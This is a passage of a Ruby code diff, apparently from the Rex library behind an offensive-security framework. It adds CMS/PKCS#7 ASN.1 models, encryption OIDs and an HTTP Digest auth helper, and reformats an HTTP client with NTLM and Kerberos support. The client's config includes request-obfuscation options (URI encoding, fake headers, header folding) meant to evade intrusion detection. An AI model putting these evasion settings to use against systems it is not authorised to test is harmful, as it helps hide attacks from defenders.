+             content: [set_of(:certs, Certificate, implicit: 0, optional: true),
+                       # CRLs - not implemented
+                       ]
+  end
+
+  class ContentType < RASN1::Types::ObjectId
+  end
+
+  class EncryptedContent < RASN1::Types::OctetString
+  end
+
+  class EncryptedContentInfo < RASN1::Model
+    sequence :encrypted_content_info,
+             content: [model(:content_type, ContentType),
+                       model(:content_encryption_algorithm, ContentEncryptionAlgorithmIdentifier),
+                       wrapper(model(:encrypted_content, EncryptedContent), implicit: 0, optional: true)
+                       ]
+  end
+
+  class Name
+    # Rather than specifying the entire structure of a name, we pass this off
+    # to OpenSSL, effectively providing an interface between RASN and OpenSSL.
+    attr_accessor :value
+
+    def initialize(options={})
+    end
+
+    def parse!(str, ber: false)
+      self.value = OpenSSL::X509::Name.new(str)
+      to_der.length
+    end
+
+    def to_der
+      self.value.to_der
+    end
+  end
+
+  class IssuerAndSerialNumber < RASN1::Model
+    sequence :signer_identifier,
+             content: [model(:issuer, Name),
+                       integer(:serial_number)
+    ]
+  end
+
+  class CmsVersion < RASN1::Types::Integer
+  end
+
+  class SubjectKeyIdentifier < RASN1::Types::OctetString
+  end
+
+  class UserKeyingMaterial < RASN1::Types::OctetString
+  end
+
+  class RecipientIdentifier < RASN1::Model
+    choice :recipient_identifier,
+           content: [model(:issuer_and_serial_number, IssuerAndSerialNumber),
+                     wrapper(model(:subject_key_identifier, SubjectKeyIdentifier), implicit: 0)]
+  end
+
+  class EncryptedKey < RASN1::Types::OctetString
+  end
+
+  class OtherKeyAttribute < RASN1::Model
+    sequence :other_key_attribute,
+             content: [objectid(:key_attr_id),
+                       any(:key_attr, optional: true)
+                      ]
+  end
+
+  class RecipientKeyIdentifier < RASN1::Model
+    sequence :recipient_key_identifier,
+             content: [model(:subject_key_identifier, SubjectKeyIdentifier),
+                       generalized_time(:date, optional: true),
+                       wrapper(model(:other, OtherKeyAttribute), optional: true)
+                      ]
+
+  end
+
+  class KeyAgreeRecipientIdentifier < RASN1::Model
+    choice :key_agree_recipient_identifier,
+           content: [model(:issuer_and_serial_number, IssuerAndSerialNumber),
+                     wrapper(model(:r_key_id, RecipientKeyIdentifier), implicit: 0)]
+  end
+
+  class RecipientEncryptedKey < RASN1::Model
+    sequence :recipient_encrypted_key,
+             content: [model(:rid, KeyAgreeRecipientIdentifier),
+                       model(:encrypted_key, EncryptedKey)]
+  end
+
+  class KEKIdentifier < RASN1::Model
+    sequence :kek_identifier,
+             content: [octet_string(:key_identifier),
+                       generalized_time(:date, optional: true),
+                       wrapper(model(:other, OtherKeyAttribute), optional: true)]
+  end
+
+  class KeyTransRecipientInfo < RASN1::Model
+    sequence :key_trans_recipient_info,
+             content: [model(:cms_version, CmsVersion),
+                       model(:rid, RecipientIdentifier),
+                       model(:key_encryption_algorithm, KeyEncryptionAlgorithmIdentifier),
+                       model(:encrypted_key, EncryptedKey)
+                      ]
+  end
+
+  class OriginatorPublicKey < RASN1::Model
+    sequence :originator_public_key,
+             content: [model(:algorithm, AlgorithmIdentifier),
+                       bit_string(:public_key)]
+  end
+
+  class OriginatorIdentifierOrKey < RASN1::Model
+    choice :originator_identifier_or_key,
+           content: [model(:issuer_and_serial_number, IssuerAndSerialNumber),
+                     model(:subject_key_identifier, SubjectKeyIdentifier),
+                     model(:originator_public_key, OriginatorPublicKey)
+                    ]
+  end
+
+  class KeyAgreeRecipientInfo < RASN1::Model
+    sequence :key_agree_recipient_info,
+             content: [model(:cms_version, CmsVersion),
+                       wrapper(model(:originator, OriginatorIdentifierOrKey), explicit: 0),
+                       wrapper(model(:ukm, UserKeyingMaterial), explicit: 1, optional: true),
+                       model(:key_encryption_algorithm, KeyEncryptionAlgorithmIdentifier),
+                       sequence_of(:recipient_encrypted_keys, RecipientEncryptedKey)
+                      ]
+  end
+
+  class KEKRecipientInfo < RASN1::Model
+    sequence :kek_recipient_info,
+             content: [model(:cms_version, CmsVersion),
+                       model(:kekid, KEKIdentifier),
+                       model(:key_encryption_algorithm, KeyEncryptionAlgorithmIdentifier),
+                       model(:encrypted_key, EncryptedKey)
+                      ]
+  end
+
+  class PasswordRecipientInfo < RASN1::Model
+    sequence :password_recipient_info,
+             content: [model(:cms_version, CmsVersion),
+                       wrapper(model(:key_derivation_algorithm, KeyDerivationAlgorithmIdentifier), explicit: 0, optional: true),
+                       model(:key_encryption_algorithm, KeyEncryptionAlgorithmIdentifier),
+                       model(:encrypted_key, EncryptedKey)
+                      ]
+  end
+
+  class OtherRecipientInfo < RASN1::Model
+    sequence :other_recipient_info,
+             content: [objectid(:ore_type),
+                       any(:ory_value)
+                      ]
+  end
+
+  class RecipientInfo < RASN1::Model
+    choice :recipient_info,
+           content: [model(:ktri, KeyTransRecipientInfo),
+                     wrapper(model(:kari, KeyAgreeRecipientInfo), implicit: 1),
+                     wrapper(model(:kekri, KEKRecipientInfo), implicit: 2),
+                     wrapper(model(:pwri, PasswordRecipientInfo), implicit: 3),
+                     wrapper(model(:ori, OtherRecipientInfo), implicit: 4)]
+  end
+
+  class EnvelopedData < RASN1::Model
+    sequence :enveloped_data,
+             explicit: 0, constructed: true,
+             content: [model(:cms_version, CmsVersion),
+                       wrapper(model(:originator_info, OriginatorInfo), implict: 0, optional: true),
+                       set_of(:recipient_infos, RecipientInfo),
+                       model(:encrypted_content_info, EncryptedContentInfo),
+                       set_of(:unprotected_attrs, Attribute, implicit: 1, optional: true),
+    ]
+  end
+
+  class ContentInfo < RASN1::Model
+    sequence :content_info,
+             content: [model(:content_type, ContentType),
+                       # In our case, expected to be EnvelopedData
+                       any(:data)
+    ]
+
+    def enveloped_data
+      if self[:content_type].value == Rex::Proto::CryptoAsn1::OIDs::OID_CMS_ENVELOPED_DATA.value
+        EnvelopedData.parse(self[:data].value)
+      end
+    end
+  end
+end
@@ -62,6 +62,13 @@ module Rex::Proto::CryptoAsn1
    OID_ROOT_LIST_SIGNER = ObjectId.new('1.3.6.1.4.1.311.10.3.9', name: 'OID_ROOT_LIST_SIGNER', label: 'Root List Signer')
    OID_WHQL_CRYPTO = ObjectId.new('1.3.6.1.4.1.311.10.3.5', name: 'OID_WHQL_CRYPTO', label: 'Windows Hardware Driver Verification')

+    OID_CMS_ENVELOPED_DATA = ObjectId.new('1.2.840.113549.1.7.3', name: 'OID_CMS_ENVELOPED_DATA', label: 'PKCS#7 CMS Enveloped Data')
+
+    OID_DES_EDE3_CBC = ObjectId.new('1.2.840.113549.3.7', name: 'OID_DES_EDE_CBC', label: 'Triple DES encryption in CBC mode')
+    OID_AES256_CBC = ObjectId.new('2.16.840.1.101.3.4.1.42', name: 'OID_AES256_CBC', label: 'AES256 in CBC mode')
+    OID_RSA_ENCRYPTION = ObjectId.new('1.2.840.113549.1.1.1', name: 'OID_RSA_ENCRYPTION', label: 'RSA public key encryption')
+    OID_RSAES_OAEP = ObjectId.new('1.2.840.113549.1.1.7', name: 'OID_RSAES_OAEP', label: 'RSA public key encryption with OAEP padding')
+
    def self.name(value)
      value = ObjectId.new(value) if value.is_a?(String)

@@ -0,0 +1,89 @@
+require 'digest'
+require 'rex/text'
+
+module Rex
+  module Proto
+    module Http
+      class AuthDigest
+
+        def make_cnonce
+          Digest::MD5.hexdigest '%x' % (::Time.now.to_i + rand(65535))
+        end
+
+        def digest(digest_user, digest_password, method, path, parameters, iis = false)
+          cnonce = make_cnonce
+          nonce_count = 1
+
+          qop = parameters['qop']
+
+          if parameters['algorithm'] =~ /(.*?)(-sess)?$/
+            algorithm = case ::Regexp.last_match(1)
+                        when 'MD5' then Digest::MD5
+                        when 'MD-5' then Digest::MD5
+                        when 'SHA1' then Digest::SHA1
+                        when 'SHA-1' then Digest::SHA1
+                        when 'SHA2' then Digest::SHA2
+                        when 'SHA-2' then Digest::SHA2
+                        when 'SHA256' then Digest::SHA256
+                        when 'SHA-256' then Digest::SHA256
+                        when 'SHA384' then Digest::SHA384
+                        when 'SHA-384' then Digest::SHA384
+                        when 'SHA512' then Digest::SHA512
+                        when 'SHA-512' then Digest::SHA512
+                        when 'RMD160' then Digest::RMD160
+                        else raise "unknown algorithm \"#{::Regexp.last_match(1)}\""
+                        end
+            algstr = parameters['algorithm']
+            sess = ::Regexp.last_match(2)
+          else
+            algorithm = Digest::MD5
+            algstr = 'MD5'
+            sess = false
+          end
+          a1 = if sess
+                 [
+                   algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"),
+                   parameters['nonce'],
+                   cnonce
+                 ].join ':'
+               else
+                 "#{digest_user}:#{parameters['realm']}:#{digest_password}"
+               end
+
+          ha1 = algorithm.hexdigest(a1)
+          ha2 = algorithm.hexdigest("#{method}:#{path}")
+
+          request_digest = [ha1, parameters['nonce']]
+          request_digest.push(('%08x' % nonce_count), cnonce, qop) if qop
+          request_digest << ha2
+          request_digest = request_digest.join ':'
+          # Same order as IE7
+          return [
+            "Digest username=\"#{digest_user}\"",
+            "realm=\"#{parameters['realm']}\"",
+            "nonce=\"#{parameters['nonce']}\"",
+            "uri=\"#{path}\"",
+            "cnonce=\"#{cnonce}\"",
+            "nc=#{'%08x' % nonce_count}",
+            "algorithm=#{algstr}",
+            "response=\"#{algorithm.hexdigest(request_digest)}\"",
+            # The spec says the qop value shouldn't be enclosed in quotes, but
+            # some versions of IIS require it and Apache accepts it.  Chrome
+            # and Firefox both send it without quotes but IE does it this way.
+            # Use the non-compliant-but-everybody-does-it to be as compatible
+            # as possible by default.  The user can override if they don't like
+            # it.
+            if iis
+              "qop=\"#{qop}\""
+            else
+              "qop=#{qop}"
+            end,
+            if parameters.key? 'opaque'
+              "opaque=\"#{parameters['opaque']}\""
+            end
+          ].compact
+        end
+      end
+    end
+  end
+end
@@ -1,823 +1,744 @@
 # -*- coding: binary -*-
+
 require 'rex/socket'

 require 'rex/text'
 require 'digest'

-
 module Rex
-module Proto
-module Http
-
-###
-#
-# Acts as a client to an HTTP server, sending requests and receiving responses.
-#
-# See the RFC: http://www.w3.org/Protocols/rfc2616/rfc2616.html
-#
-###
-class Client
-
-  #
-  # Creates a new client instance
-  # @param http_trace_proc_request [Proc] A proc object passed to log HTTP requests if HTTP-Trace is set
-  # @param http_trace_proc_response [Proc] A proc object passed to log HTTP responses if HTTP-Trace is set
-  #
-  def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil, username = '', password = '', kerberos_authenticator: nil, comm: nil, subscriber: nil)
-    self.hostname = host
-    self.port     = port.to_i
-    self.context  = context
-    self.ssl      = ssl
-    self.ssl_version = ssl_version
-    self.proxies  = proxies
-    self.username = username
-    self.password = password
-    self.kerberos_authenticator = kerberos_authenticator
-    self.comm = comm
-    self.subscriber = subscriber || HttpSubscriber.new
-    
-    # Take ClientRequest's defaults, but override with our own
-    self.config = Http::ClientRequest::DefaultConfig.merge({
-      'read_max_data'   => (1024*1024*1),
-      'vhost'           => self.hostname,
-      'ssl_server_name_indication' => self.hostname,
-    })
-    self.config['agent'] ||= Rex::UserAgent.session_agent
-
-    # XXX: This info should all be controlled by ClientRequest
-    self.config_types = {
-      'uri_encode_mode'        => ['hex-normal', 'hex-all', 'hex-random', 'hex-noslashes', 'u-normal', 'u-random', 'u-all'],
-      'uri_encode_count'       => 'integer',
-      'uri_full_url'           => 'bool',
-      'pad_method_uri_count'   => 'integer',
-      'pad_uri_version_count'  => 'integer',
-      'pad_method_uri_type'    => ['space', 'tab', 'apache'],
-      'pad_uri_version_type'   => ['space', 'tab', 'apache'],
-      'method_random_valid'    => 'bool',
-      'method_random_invalid'  => 'bool',
-      'method_random_case'     => 'bool',
-      'version_random_valid'   => 'bool',
-      'version_random_invalid' => 'bool',
-      'uri_dir_self_reference' => 'bool',
-      'uri_dir_fake_relative'  => 'bool',
-      'uri_use_backslashes'    => 'bool',
-      'pad_fake_headers'       => 'bool',
-      'pad_fake_headers_count' => 'integer',
-      'pad_get_params'         => 'bool',
-      'pad_get_params_count'   => 'integer',
-      'pad_post_params'        => 'bool',
-      'pad_post_params_count'  => 'integer',
-      'shuffle_get_params'     => 'bool',
-      'shuffle_post_params'    => 'bool',
-      'uri_fake_end'           => 'bool',
-      'uri_fake_params_start'  => 'bool',
-      'header_folding'         => 'bool',
-      'chunked_size'           => 'integer',
-      'partial'                => 'bool'
-    }
-  end
-
-  #
-  # Set configuration options
-  #
-  def set_config(opts = {})
-    opts.each_pair do |var,val|
-      # Default type is string
-      typ = self.config_types[var] || 'string'
-
-      # These are enum types
-      if typ.is_a?(Array)
-        if not typ.include?(val)
-          raise RuntimeError, "The specified value for #{var} is not one of the valid choices"
-        end
-      end
-
-      # The caller should have converted these to proper ruby types, but
-      # take care of the case where they didn't before setting the
-      # config.
-
-      if(typ == 'bool')
-        val = (val == true || val.to_s =~ /^(t|y|1)/i)
-      end
-
-      if(typ == 'integer')
-        val = val.to_i
-      end
-
-      self.config[var]=val
-    end
-  end
-
-  #
-  # Create an arbitrary HTTP request
-  #
-  # @param opts [Hash]
-  # @option opts 'agent'         [String] User-Agent header value
-  # @option opts 'connection'    [String] Connection header value
-  # @option opts 'cookie'        [String] Cookie header value
-  # @option opts 'data'          [String] HTTP data (only useful with some methods, see rfc2616)
-  # @option opts 'encode'        [Bool]   URI encode the supplied URI, default: false
-  # @option opts 'headers'       [Hash]   HTTP headers, e.g. <code>{ "X-MyHeader" => "value" }</code>
-  # @option opts 'method'        [String] HTTP method to use in the request, not limited to standard methods defined by rfc2616, default: GET
-  # @option opts 'proto'         [String] protocol, default: HTTP
-  # @option opts 'query'         [String] raw query string
-  # @option opts 'raw_headers'   [String] Raw HTTP headers
-  # @option opts 'uri'           [String] the URI to request
-  # @option opts 'version'       [String] version of the protocol, default: 1.1
-  # @option opts 'vhost'         [String] Host header value
-  #
-  # @return [ClientRequest]
-  def request_raw(opts = {})
-    opts = self.config.merge(opts)
-
-    opts['cgi'] = false
-    opts['port'] = self.port
-    opts['ssl'] = self.ssl
-
-    ClientRequest.new(opts)
-  end
-
-  #
-  # Create a CGI compatible request
-  #
-  # @param (see #request_raw)
-  # @option opts (see #request_raw)
-  # @option opts 'ctype'         [String] Content-Type header value, default for POST requests: +application/x-www-form-urlencoded+
-  # @option opts 'encode_params' [Bool]   URI encode the GET or POST variables (names and values), default: true
-  # @option opts 'vars_get'      [Hash]   GET variables as a hash to be translated into a query string
-  # @option opts 'vars_post'     [Hash]   POST variables as a hash to be translated into POST data
-  # @option opts 'vars_form_data'     [Hash]   POST form_data variables as a hash to be translated into multi-part POST form data
-  #
-  # @return [ClientRequest]
-  def request_cgi(opts = {})
-    opts = self.config.merge(opts)
-
-    opts['cgi'] = true
-    opts['port'] = self.port
-    opts['ssl'] = self.ssl
-
-    ClientRequest.new(opts)
-  end
-
-  #
-  # Connects to the remote server if possible.
-  #
-  # @param t [Integer] Timeout
-  # @see Rex::Socket::Tcp.create
-  # @return [Rex::Socket::Tcp]
-  def connect(t = -1)
-    # If we already have a connection and we aren't pipelining, close it.
-    if (self.conn)
-      if !pipelining?
-        close
-      else
-        return self.conn
-      end
-    end
-
-    timeout = (t.nil? or t == -1) ? 0 : t
-
-    self.conn = Rex::Socket::Tcp.create(
-      'PeerHost'    => self.hostname,
-      'PeerHostname' => self.config['ssl_server_name_indication'] || self.config['vhost'],
-      'PeerPort'   => self.port.to_i,
-      'LocalHost'  => self.local_host,
-      'LocalPort'  => self.local_port,
-      'Context'    => self.context,
-      'SSL'        => self.ssl,
-      'SSLVersion' => self.ssl_version,
-      'Proxies'    => self.proxies,
-      'Timeout'    => timeout,
-      'Comm'       => self.comm
-    )
-  end
-
-  #
-  # Closes the connection to the remote server.
-  #
-  def close
-    if self.conn && !self.conn.closed?
-      self.conn.shutdown
-      self.conn.close
-    end
-
-    self.conn = nil
-    self.ntlm_client = nil
-  end
-
-  #
-  # Sends a request and gets a response back
-  #
-  # If the request is a 401, and we have creds, it will attempt to complete
-  # authentication and return the final response
-  #
-  # @return (see #_send_recv)
-  def send_recv(req, t = -1, persist = false)
-    res = _send_recv(req, t, persist)
-    if res and res.code == 401 and res.headers['WWW-Authenticate']
-      res = send_auth(res, req.opts, t, persist)
-    end
-    res
-  end
-
-  #
-  # Transmit an HTTP request and receive the response
-  #
-  # If persist is set, then the request will attempt to reuse an existing
-  # connection.
-  #
-  # Call this directly instead of {#send_recv} if you don't want automatic
-  # authentication handling.
-  #
-  # @return (see #read_response)
-  def _send_recv(req, t = -1, persist = false)
-    @pipeline = persist
-    subscriber.on_request(req)
-    if req.respond_to?(:opts) && req.opts['ntlm_transform_request'] && self.ntlm_client
-      req = req.opts['ntlm_transform_request'].call(self.ntlm_client, req)
-    elsif req.respond_to?(:opts) && req.opts['krb_transform_request'] && self.krb_encryptor
-      req = req.opts['krb_transform_request'].call(self.krb_encryptor, req)
-    end
-    
-    send_request(req, t)
-
-    res = read_response(t, :original_request => req)
-    if req.respond_to?(:opts) && req.opts['ntlm_transform_response'] && self.ntlm_client
-      req.opts['ntlm_transform_response'].call(self.ntlm_client, res)
-    elsif req.respond_to?(:opts) && req.opts['krb_transform_response'] && self.krb_encryptor
-      req = req.opts['krb_transform_response'].call(self.krb_encryptor, res)
-    end
-    res.request = req.to_s if res
-    res.peerinfo = peerinfo if res
-    subscriber.on_response(res)
-    res
-  end
-
-  #
-  # Send an HTTP request to the server
-  #
-  # @param req [Request,ClientRequest,#to_s] The request to send
-  # @param t (see #connect)
-  #
-  # @return [void]
-  def send_request(req, t = -1)
-    connect(t)
-    conn.put(req.to_s)
-  end
-
-  # Resends an HTTP Request with the proper authentication headers
-  # set. If we do not support the authentication type the server requires
-  # we return the original response object
-  #
-  # @param res [Response] the HTTP Response object
-  # @param opts [Hash] the options used to generate the original HTTP request
-  # @param t [Integer] the timeout for the request in seconds
-  # @param persist [Boolean] whether or not to persist the TCP connection (pipelining)
-  #
-  # @return [Response] the last valid HTTP response object we received
-  def send_auth(res, opts, t, persist)
-    if opts['username'].nil? or opts['username'] == ''
-      if self.username and not (self.username == '')
-        opts['username'] = self.username
-        opts['password'] = self.password
-      else
-        opts['username'] = nil
-        opts['password'] = nil
-      end
-    end
-
-    if opts[:kerberos_authenticator].nil?
-      opts[:kerberos_authenticator] = self.kerberos_authenticator
-    end
-
-    return res if (opts['username'].nil? or opts['username'] == '') and opts[:kerberos_authenticator].nil?
-    supported_auths = res.headers['WWW-Authenticate']
-
-    # if several providers are available, the client may want one in particular
-    preferred_auth = opts['preferred_auth']
-
-    if supported_auths.include?('Basic') && (preferred_auth.nil? || preferred_auth == 'Basic')
-      opts['headers'] ||= {}
-      opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] )
-      req = request_cgi(opts)
-      res = _send_recv(req,t,persist)
-      return res
-    elsif supported_auths.include?('Digest') && (preferred_auth.nil? || preferred_auth == 'Digest')
-      temp_response = digest_auth(opts)
-      if temp_response.kind_of? Rex::Proto::Http::Response
-        res = temp_response
-      end
-      return res
-    elsif supported_auths.include?('NTLM') && (preferred_auth.nil? || preferred_auth == 'NTLM')
-      opts['provider'] = 'NTLM'
-      temp_response = negotiate_auth(opts)
-      if temp_response.kind_of? Rex::Proto::Http::Response
-        res = temp_response
-      end
-      return res
-    elsif supported_auths.include?('Negotiate') && (preferred_auth.nil? || preferred_auth == 'Negotiate')
-      opts['provider'] = 'Negotiate'
-      temp_response = negotiate_auth(opts)
-      if temp_response.kind_of? Rex::Proto::Http::Response
-        res = temp_response
-      end
-      return res
-    elsif supported_auths.include?('Negotiate') && (preferred_auth.nil? || preferred_auth == 'Kerberos')
-      opts['provider'] = 'Negotiate'
-      temp_response = kerberos_auth(opts)
-      if temp_response.kind_of? Rex::Proto::Http::Response
-        res = temp_response
-      end
-      return res
-    end
-    return res
-  end
-
-  # Converts username and password into the HTTP Basic authorization
-  # string.
-  #
-  # @return [String] A value suitable for use as an Authorization header
-  def basic_auth_header(username,password)
-    auth_str = username.to_s + ":" + password.to_s
-    auth_str = "Basic " + Rex::Text.encode_base64(auth_str)
-  end
-
-
-  def make_cnonce
-    Digest::MD5.hexdigest "%x" % (::Time.now.to_i + rand(65535))
-  end
-
-  # Send a series of requests to complete Digest Authentication
-  #
-  # @param opts [Hash] the options used to build an HTTP request
-  # @return [Response] the last valid HTTP response we received
-  def digest_auth(opts={})
-    cnonce = make_cnonce
-    nonce_count = 0
-
-    to = opts['timeout'] || 20
-
-    digest_user = opts['username'] || ""
-    digest_password =  opts['password'] || ""
-
-    method = opts['method']
-    path = opts['uri']
-    iis = true
-    if (opts['DigestAuthIIS'] == false or self.config['DigestAuthIIS'] == false)
-      iis = false
-    end
-
-    begin
-    nonce_count += 1
-
-    resp = opts['response']
-
-    if not resp
-      # Get authentication-challenge from server, and read out parameters required
-      r = request_cgi(opts.merge({
-          'uri' => path,
-          'method' => method }))
-      resp = _send_recv(r, to)
-      unless resp.kind_of? Rex::Proto::Http::Response
-        return nil
-      end
-
-      if resp.code != 401
-        return resp
-      end
-      return resp unless resp.headers['WWW-Authenticate']
-    end
-
-    # Don't anchor this regex to the beginning of string because header
-    # folding makes it appear later when the server presents multiple
-    # WWW-Authentication options (such as is the case with IIS configured
-    # for Digest or NTLM).
-    resp['www-authenticate'] =~ /Digest (.*)/
-
-    parameters = {}
-    $1.split(/,[[:space:]]*/).each do |p|
-      k, v = p.split("=", 2)
-      parameters[k] = v.gsub('"', '')
-    end
-
-    qop = parameters['qop']
-
-    if parameters['algorithm'] =~ /(.*?)(-sess)?$/
-      algorithm = case $1
-      when 'MD5' then Digest::MD5
-      when 'SHA1' then Digest::SHA1
-      when 'SHA2' then Digest::SHA2
-      when 'SHA256' then Digest::SHA256
-      when 'SHA384' then Digest::SHA384
-      when 'SHA512' then Digest::SHA512
-      when 'RMD160' then Digest::RMD160
-      else raise Error, "unknown algorithm \"#{$1}\""
-      end
-      algstr = parameters["algorithm"]
-      sess = $2
-    else
-      algorithm = Digest::MD5
-      algstr = "MD5"
-      sess = false
-    end
-
-    a1 = if sess then
-      [
-        algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"),
-        parameters['nonce'],
-        cnonce
-      ].join ':'
-    else
-      "#{digest_user}:#{parameters['realm']}:#{digest_password}"
-    end
-
-    ha1 = algorithm.hexdigest(a1)
-    ha2 = algorithm.hexdigest("#{method}:#{path}")
-
-    request_digest = [ha1, parameters['nonce']]
-    request_digest.push(('%08x' % nonce_count), cnonce, qop) if qop
-    request_digest << ha2
-    request_digest = request_digest.join ':'
-
-    # Same order as IE7
-    auth = [
-      "Digest username=\"#{digest_user}\"",
-      "realm=\"#{parameters['realm']}\"",
-      "nonce=\"#{parameters['nonce']}\"",
-      "uri=\"#{path}\"",
-      "cnonce=\"#{cnonce}\"",
-      "nc=#{'%08x' % nonce_count}",
-      "algorithm=#{algstr}",
-      "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"",
-      # The spec says the qop value shouldn't be enclosed in quotes, but
-      # some versions of IIS require it and Apache accepts it.  Chrome
-      # and Firefox both send it without quotes but IE does it this way.
-      # Use the non-compliant-but-everybody-does-it to be as compatible
-      # as possible by default.  The user can override if they don't like
-      # it.
-      if qop.nil? then
-      elsif iis then
-        "qop=\"#{qop}\""
-      else
-        "qop=#{qop}"
-      end,
-      if parameters.key? 'opaque' then
-        "opaque=\"#{parameters['opaque']}\""
-      end
-    ].compact
-
-    headers ={ 'Authorization' => auth.join(', ') }
-    headers.merge!(opts['headers']) if opts['headers']
-
-    # Send main request with authentication
-    r = request_cgi(opts.merge({
-      'uri' => path,
-      'method' => method,
-      'headers' => headers }))
-    resp = _send_recv(r, to, true)
-    unless resp.kind_of? Rex::Proto::Http::Response
-      return nil
-    end
-
-    return resp
-
-    rescue ::Errno::EPIPE, ::Timeout::Error
-    end
-  end
-
-  def kerberos_auth(opts={})
-    to = opts['timeout'] || 20
-    auth_result = self.kerberos_authenticator.authenticate(mechanism: Rex::Proto::Gss::Mechanism::KERBEROS)
-    gss_data = auth_result[:security_blob]
-    gss_data_b64 = Rex::Text.encode_base64(gss_data)
-
-    # Separate options for the auth requests
-    auth_opts = opts.clone
-    auth_opts['headers'] = opts['headers'].clone
-    auth_opts['headers']['Authorization'] = "Kerberos #{gss_data_b64}"
-
-    if auth_opts['no_body_for_auth']
-      auth_opts.delete('data')
-      auth_opts.delete('krb_transform_request')
-      auth_opts.delete('krb_transform_response')
-    end
-
-    begin
-      # Send the auth request
-      r = request_cgi(auth_opts)
-      resp = _send_recv(r, to)
-      unless resp.kind_of? Rex::Proto::Http::Response
-        return nil
-      end
-
-      # Get the challenge and craft the response
-      response = resp.headers['WWW-Authenticate'].scan(/Kerberos ([A-Z0-9\x2b\x2f=]+)/ni).flatten[0]
-      return resp unless response
-
-      decoded = Rex::Text.decode_base64(response)
-      mutual_auth_result = self.kerberos_authenticator.parse_gss_init_response(decoded, auth_result[:session_key])
-      self.krb_encryptor = self.kerberos_authenticator.get_message_encryptor(mutual_auth_result[:ap_rep_subkey], 
-                                                                                  auth_result[:client_sequence_number],
-                                                                                  mutual_auth_result[:server_sequence_number])
-
-      if opts['no_body_for_auth']
-        # If the body wasn't sent in the authentication, now do the actual request
-        r = request_cgi(opts)
-        resp = _send_recv(r, to, true)
-      end
-      return resp
-
-    rescue ::Errno::EPIPE, ::Timeout::Error
-      return nil
-    end
-  end
-
-  #
-  # Builds a series of requests to complete Negotiate Auth. Works essentially
-  # the same way as Digest auth. Same pipelining concerns exist.
-  #
-  # @option opts (see #send_request_cgi)
-  # @option opts provider ["Negotiate","NTLM"] What Negotiate provider to use
-  #
-  # @return [Response] the last valid HTTP response we received
-  def negotiate_auth(opts={})
-
-    to = opts['timeout'] || 20
-    opts['username'] ||= ''
-    opts['password'] ||= ''
-
-    if opts['provider'] and opts['provider'].include? 'Negotiate'
-      provider = "Negotiate "
-    else
-      provider = "NTLM "
-    end
-
-    opts['method']||= 'GET'
-    opts['headers']||= {}
-
-    workstation_name = Rex::Text.rand_text_alpha(rand(8)+6)
-    domain_name = self.config['domain']
-
-    ntlm_client = ::Net::NTLM::Client.new(
-      opts['username'],
-      opts['password'],
-      workstation: workstation_name,
-      domain: domain_name,
-    )
-    type1 = ntlm_client.init_context
-
-    begin
-      # Separate options for the auth requests
-      auth_opts = opts.clone
-      auth_opts['headers'] = opts['headers'].clone
-      auth_opts['headers']['Authorization'] = provider + type1.encode64
-
-      if auth_opts['no_body_for_auth']
-        auth_opts.delete('data')
-        auth_opts.delete('ntlm_transform_request')
-        auth_opts.delete('ntlm_transform_response')
-      end
-
-      # First request to get the challenge
-      r = request_cgi(auth_opts)
-      resp = _send_recv(r, to)
-      unless resp.kind_of? Rex::Proto::Http::Response
-        return nil
-      end
-
-      return resp unless resp.code == 401 && resp.headers['WWW-Authenticate']
-
-      # Get the challenge and craft the response
-      ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/ni).flatten[0]
-      return resp unless ntlm_challenge
-
-      ntlm_message_3 = ntlm_client.init_context(ntlm_challenge, channel_binding)
-
-      self.ntlm_client = ntlm_client
-      # Send the response
-      auth_opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3.encode64}"
-      r = request_cgi(auth_opts)
-      resp = _send_recv(r, to, true)
-
-      unless resp.kind_of? Rex::Proto::Http::Response
-        return nil
-      end
-      if opts['no_body_for_auth']
-        # If the body wasn't sent in the authentication, now do the actual request
-        r = request_cgi(opts)
-        resp = _send_recv(r, to, true)
-      end
-      return resp
-
-    rescue ::Errno::EPIPE, ::Timeout::Error
-      return nil
-    end
-  end
-
-  def channel_binding
-    if !self.conn.respond_to?(:peer_cert) or self.conn.peer_cert.nil?
-      nil
-    else
-      Net::NTLM::ChannelBinding.create(OpenSSL::X509::Certificate.new(self.conn.peer_cert))
-    end
-  end
-
-  # Read a response from the server
-  #
-  # Wait at most t seconds for the full response to be read in.
-  # If t is specified as a negative value, it indicates an indefinite wait cycle.
-  # If t is specified as nil or 0, it indicates no response parsing is required.
-  #
-  # @return [Response]
-  def read_response(t = -1, opts = {})
-    # Return a nil response if timeout is nil or 0
-    return if t.nil? || t == 0
-
-    resp = Response.new
-    resp.max_data = config['read_max_data']
-
-    original_request = opts.fetch(:original_request) { nil }
-    parse_opts = {}
-    unless original_request.nil?
-      parse_opts = { :orig_method => original_request.opts['method'] }
-    end
-
-    Timeout.timeout((t < 0) ? nil : t) do
-
-      rv = nil
-      while (
-               not conn.closed? and
-               rv != Packet::ParseCode::Completed and
-               rv != Packet::ParseCode::Error
-              )
-
-        begin
-
-          buff = conn.get_once(resp.max_data, 1)
-          rv   = resp.parse(buff || '', parse_opts)
-
-        # Handle unexpected disconnects
-        rescue ::Errno::EPIPE, ::EOFError, ::IOError
-          case resp.state
-          when Packet::ParseState::ProcessingHeader
-            resp = nil
-          when Packet::ParseState::ProcessingBody
-            # truncated request, good enough
-            resp.error = :truncated
-          end
-          break
+  module Proto
+    module Http
+      ###
+      #
+      # Acts as a client to an HTTP server, sending requests and receiving responses.
+      #
+      # See the RFC: http://www.w3.org/Protocols/rfc2616/rfc2616.html
+      #
+      ###
+      class Client
+
+        #
+        # Creates a new client instance
+        # @param http_trace_proc_request [Proc] A proc object passed to log HTTP requests if HTTP-Trace is set
+        # @param http_trace_proc_response [Proc] A proc object passed to log HTTP responses if HTTP-Trace is set
+        #
+        def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil, username = '', password = '', kerberos_authenticator: nil, comm: nil, subscriber: nil)
+          self.hostname = host
+          self.port = port.to_i
+          self.context = context
+          self.ssl = ssl
+          self.ssl_version = ssl_version
+          self.proxies = proxies
+          self.username = username
+          self.password = password
+          self.kerberos_authenticator = kerberos_authenticator
+          self.comm = comm
+          self.subscriber = subscriber || HttpSubscriber.new
+
